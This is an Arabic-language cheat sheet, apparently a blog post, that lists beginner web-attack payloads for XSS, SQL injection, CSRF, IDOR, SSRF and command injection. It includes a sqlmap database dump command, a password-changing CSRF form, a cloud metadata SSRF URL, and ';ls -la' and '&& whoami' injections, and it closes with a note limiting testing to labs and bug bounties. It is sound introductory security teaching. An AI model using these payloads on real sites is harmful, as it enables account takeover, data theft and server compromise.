اوامر الاختراق ل XSS, SQLi, CSRF, IDOR, SSRF, RCE

 🧪 1. XSS (Cross-Site Scripting)

الهدف: تنفيذ JavaScript داخل صفحة ضحية.

🔹 مثال:

html

<script>alert('XSS')</script>

🧪 إدخاله في:

نموذج تعليق (Comment box)

عنوان البحث (Search bar)

URL:

https://vulnerable.site/search?q=<script>alert('XSS')</script>

🛠️ أدوات:

Burp Suite

OWASP ZAP

🧪 2. SQLi (SQL Injection)

الهدف: حقن استعلامات SQL للوصول أو تعديل قاعدة البيانات.

🔹 مثال بسيط (Login Bypass):

sql

' OR 1=1 --

🔹 في الحقول:

اسم المستخدم / كلمة المرور

🔹 مثال مع عنوان URL:

bash

https://site.com/product?id=1' OR '1'='1

🧠 أدوات:

sqlmap:

bash

sqlmap -u "https://site.com/product?id=1" --dbs

🧪 3. CSRF (Cross-Site Request Forgery)

الهدف: استغلال جلسة المستخدم لتنفيذ إجراء دون علمه.

🔹 مثال (تغيير كلمة مرور):

html

<form action="https://vulnerable.site/change-password" method="POST">

  <input type="hidden" name="password" value="hacked123">

  <input type="submit" value="Click Me">

</form>

يُرسل الضحية النموذج وهو مسجّل الدخول، فيتم تنفيذ الأمر!

✅ لا يُكشف بالأوامر، بل بالهندسة الاجتماعية وHTML.

🧪 4. IDOR (Insecure Direct Object Reference)

الهدف: الوصول إلى بيانات مستخدمين آخرين عبر تغيير رقم في الرابط أو الطلب.

🔹 مثال:

bash

GET https://site.com/user/123/profile

🔁 غيّره إلى:

GET https://site.com/user/124/profile

إذا لم يكن هناك تحقق من هوية المستخدم، فستظهر بيانات شخص آخر.

✅ افحص دائمًا:

API Endpoints

روابط "حسابي" أو "ملف التعريف"

🧪 5. SSRF (Server-Side Request Forgery)

الهدف: إجبار الخادم على إرسال طلب داخلي (مثلاً إلى localhost أو IP داخلي).

🔹 مثال:

bash

https://vulnerable.site/fetch?url=http://localhost:8080/admin

أو:

bash

http://169.254.169.254/latest/meta-data/

🧠 أدوات كشف:

Burp Suite + Intruder

SSRFmap

🧪 6. RCE (Remote Code Execution)

الهدف: تنفيذ أوامر نظام التشغيل على السيرفر.

🔹 مثال (عبر نموذج تحميل أوامر):

bash

;ls -la

أو:

bash

&& whoami

🔹 مثال على حقن أمر في URL:

bash

http://site.com/run.php?cmd=ls

🧠 أدوات:

Burp Suite Repeater

curl + مراقبة الردود

⚠️ ملاحظات مهمة:

ثغرة درجة الخطورة مسموح اختبارها؟

XSS متوسطة – خطيرة ✅ نعم، في بيئات تدريب

SQLi خطيرة ✅ نعم، في مختبرات فقط

CSRF متوسطة ✅ نعم، لتعلّم الدفاع

IDOR خطيرة ✅ فقط في Bug Bounty

SSRF خطيرة جدًا ✅ لكن بحذر شديد

RCE شديدة الخطورة ✅ في بيئات اختبار فقط


هذا توضيحات فقط

إرسال تعليق

0 تعليقات